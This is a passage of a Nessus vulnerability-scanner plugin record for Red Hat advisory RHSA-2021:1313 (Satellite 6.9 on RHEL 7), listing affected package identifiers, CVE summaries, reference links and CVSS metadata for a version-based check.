"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_ansible_core", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_azure_rm", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_bootdisk", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_discovery", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_hooks", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_kubevirt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_leapp", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-graphql-batch", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_openscap", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_remote_execution", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_remote_execution-cockpit", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-gssapi", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_remote_execution_core", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_rh_cloud", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_templates", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_theme_satellite", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_admin", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-foreman_virt_who_configure", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_ansible", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-formatador", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-friendly_id", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_azure_rm", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fx", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-get_process_mem", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-gettext", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-gettext_i18n_rails", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_bootdisk", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-git", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-gitlab-sidekiq-fetcher", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-globalid", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_discovery", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-google-api-client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_docker", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-google-cloud-env", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-googleauth", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_kubevirt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_leapp", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_rpm_client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_openscap", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulpcore_client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_remote_execution", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_tasks", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-puma", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-puma-plugin-systemd", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_templates", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-quantile", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_foreman_virt_who_configure", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rabl", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hammer_cli_katello", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack-cors", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack-jsonp", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-hashie", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack-protection", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rack-test", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rails", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-highline", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rails-dom-testing", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-http", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rails-html-sanitizer", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-http-cookie", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rails-i18n", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-railties", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-http-form_data", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rainbow", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rb-inotify", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-http_parser.rb", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rbovirt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-httpclient", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rbvmomi", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-i18n", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-record_tag_helper", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-infoblox", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-recursive-open-struct", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ipaddress", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-redfish_client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-jgrep", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-redhat_access", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-redhat_access_lib", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-redis", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-representable", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-journald-logger", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-responders", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rest-client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-journald-native", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-retriable", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-jwt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rkerberos", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-roadie", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-kafo", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-roadie-rails", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-kafo_parsers", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-robotex", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rsec", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-kafo_wizards", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ruby-libvirt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-katello", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ruby2ruby", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-kubeclient", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ruby_parser", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ldap_fluff", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-rubyipmi", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-runcible", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-little-plugger", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-locale", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-logging", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-logging-journald", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-loofah", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mail", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-marcel", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-memoist", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-method_source", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mime-types", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mime-types-data", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mimemagic", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mini_mime", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mini_portile2", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ms_rest", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ms_rest_azure", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-multi_json", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-multipart-post", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-mustermann", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-ldap", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-ping", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-scp", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-ssh", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-net-ssh-krb", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-netrc", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-newt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-nio4r", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-nokogiri", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-oauth", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-openscap", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-optimist", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-os", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ovirt-engine-sdk", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ovirt_provision_plugin", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-parse-cron", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-passenger", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-passenger-native", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-passenger-native-libs", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pg", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-polyglot", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-powerbar", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-prometheus-client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-promise.rb", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-public_suffix", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_2to3_migration_client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_ansible_client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_certguard_client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_container_client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_deb_client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-pulp_file_client", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-scoped_search", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sd_notify", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-secure_headers", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sequel", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-server_sent_events", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sexp_processor", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sidekiq", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-signet", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sinatra", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_ansible", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dhcp_infoblox", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dhcp_remote_isc", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_discovery", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_discovery_image", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dns_infoblox", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dynflow", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_dynflow_core", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-safemode", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_openscap", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_pulp", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-smart_proxy_remote_execution_ssh", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sprockets", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sprockets-rails", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sqlite3", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-sshkey", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-statsd-instrument", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-stomp", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-text", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-thor", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-thread_safe", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-tilt", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-timeliness", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-tzinfo", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-uber", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-unf", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-unf_ext", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-unicode", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-unicode-display_width", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-validates_lengths_from_database", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-webpack-rails", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-websocket-driver", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-websocket-extensions", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-will_paginate", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-zeitwerk", "p-cpe:/a:redhat:enterprise_linux:tfm-runtime"], "id": "REDHAT-RHSA-2021-1313.NASL", "href": "https://www.tenable.com/plugins/nessus/148903", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:1313. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148903);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\n \"CVE-2017-2662\",\n \"CVE-2019-18874\",\n \"CVE-2020-9402\",\n \"CVE-2020-11612\",\n \"CVE-2020-14335\",\n \"CVE-2020-25633\"\n );\n script_xref(name:\"RHSA\", value:\"2021:1313\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"RHEL 7 : Satellite 6.9 Release (Moderate) (RHSA-2021:1313)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:1313 advisory.\n\n - rubygem-rest-client: session fixation vulnerability Set-Cookie headers present in an HTTP 30x redirection\n responses (CVE-2015-1820)\n\n - rubygem-rest-client: unsanitized application logging (CVE-2015-3448)\n\n - foreman: Managing repositories with their id via hammer does not respect the role filters (CVE-2017-2662)\n\n - rack-protection: Timing attack in authenticity_token.rb (CVE-2018-1000119)\n\n - rubygem-rack: hijack sessions by using timing attacks targeting the session id (CVE-2019-16782)\n\n - python-psutil: Double free because of refcount mishandling (CVE-2019-18874)\n\n - netty: compression/decompression codecs don't enforce limits on buffer allocation sizes (CVE-2020-11612)\n\n - foreman: world-readable OMAPI secret through the ISC DHCP server (CVE-2020-14335)\n\n - rubygem-activeview: Cross-site scripting in translation helpers (CVE-2020-15169)\n\n - resteasy-client: potential sensitive information leakage in JAX-RS RESTEasy Client's\n WebApplicationException handling (CVE-2020-25633)\n\n - rubygem-activestorage: circumvention of file size limits in ActiveStorage (CVE-2020-8162)\n\n - rubygem-actionpack: possible strong parameters bypass (CVE-2020-8164)\n\n - rubygem-activesupport: potentially unintended unmarshalling of user-provided objects in MemCacheStore and\n RedisCacheStore (CVE-2020-8165)\n\n - rubygem-actionpack: ability to forge per-form CSRF tokens given a global CSRF token (CVE-2020-8166)\n\n - rubygem-actionview: CSRF vulnerability in rails-ujs (CVE-2020-8167)\n\n - rubygem-rails: untrusted users able to run pending migrations in production (CVE-2020-8185)\n\n - django: potential SQL injection via tolerance parameter in GIS functions and aggregates on Oracle\n (CVE-2020-9402)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2015-1820\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2015-3448\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2017-2662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2018-1000119\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-16782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-18874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8162\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8164\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8166\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8167\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8185\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-9402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11612\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14335\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25633\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:1313\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1205291\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1240982\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1434106\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1534027\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1772014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1789100\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1810088\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1816216\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1842634\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1843005\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1843072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1843084\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1843152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1852380\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1858302\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1877566\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1879042\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9402\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 79, 89, 119, 200, 201, 209, 250, 352, 385, 400, 416, 532, 862);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansible-collection-redhat-satellite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansible-runner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansiblerole-foreman_scap_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansiblerole-insights-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansiblerole-satellite-receptor-installer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:candlepin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:candlepin-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:crane-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:createrepo_c\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:createrepo_c-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-bootloaders-redhat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-bootloaders-redhat-tftpboot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-discovery-image\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-discovery-image-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-discovery-image-service-tui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-dynflow-sidekiq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-gce\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-installer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-installer-katello\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-journald\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-openstack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-ovirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-proxy-content\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-proxy-journald\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-proxy-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-telemetry\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:foreman-vmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hfsplus-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:katello\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:katello-certs-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:katello-client-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:katello-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:katello-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:katello-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:keycloak-httpd-client-install\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kobo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libcomps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libmodulemd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libmodulemd2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsolv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libwebsockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:livecd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_passenger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_xsendfile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ostree\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pcp-mmvstatsd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-admin-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-docker-admin-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-docker-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-katello\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-maintenance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-nodes-child\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-nodes-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-nodes-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-ostree-admin-extensions\");\n script_set_attribute(attribute:\"cpe\", 